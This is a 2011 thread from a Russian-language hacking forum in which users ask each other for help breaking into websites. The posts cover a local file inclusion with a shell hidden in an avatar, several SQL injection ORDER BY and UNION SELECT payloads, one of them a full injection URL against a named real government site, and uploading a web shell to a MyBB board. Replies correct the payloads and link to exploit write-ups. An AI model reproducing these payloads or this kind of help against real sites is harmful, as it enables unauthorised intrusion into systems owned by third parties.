 |
|
14.04.2011, 22:54
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
vbseo lfi. если в аватарку дописать шелл, и проинклюдить подключает как картинку. ava%00.php пишит ошибку, точнее не срабатывает нулл байт, пробывал заменить слешами тоже самое. Выше директории форума не выйти. Какие есть варианты.?*
|
|
|
15.04.2011, 12:19
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами:
10333826
Репутация:
369
|
|
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане
|
|
|
|
15.04.2011, 13:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от satana8920
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане
пробуй не плюс, а пробел
|
|
|
|
15.04.2011, 16:51
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от satana8920
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане
В пост запросах нужно использовать пробел вместо знака плюс(+), т.к. знак плюс(+) именно в гет запросах обозначает пробел, т.е. запрос нужно отправить такой:
Код:
select state from zip where zipcode = '23243' ORDER BY 1000#
или же:
Код:
select state from zip where zipcode = '23243' ORDER BY 1000 AND '1'='1
|
|
|
|
15.04.2011, 19:04
|
|
Познающий
Регистрация: 10.04.2011
Сообщений: 49
С нами:
7942646
Репутация:
0
|
|
помогите раскрутить
Код:
http://www.maine.gov/tools/whatsnew/index.php?topic=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
|
|
|
|
15.04.2011, 19:37
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
|
|
|
|
15.04.2011, 20:02
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Redwood
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
А что там читать?
/* - полный
-- - строчный
# - строчный
|
|
|
|
16.04.2011, 01:56
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.
|
|
|
|
16.04.2011, 02:57
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
mybb
Сообщение от cipa21
Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.
/thread27777.html
http://www.securitylab.ru/vulnerability/379819.php
http://forum.xakepok.org/showthread.php?t=388
http://securityvulns.ru/docs26044.html
/showthread.php?t=149667
|
|
|
|
21.04.2011, 11:10
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
С нами:
8953976
Репутация:
16
|
|
C завидной регулярностью попадаю на такую штуку. Не получается подобрать кол-во полей. Что не так?
Пример, вот. Ошибка не пропадает, хоть убейся.
http://www.oaontc.ru/node/243?SysNum=137159
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
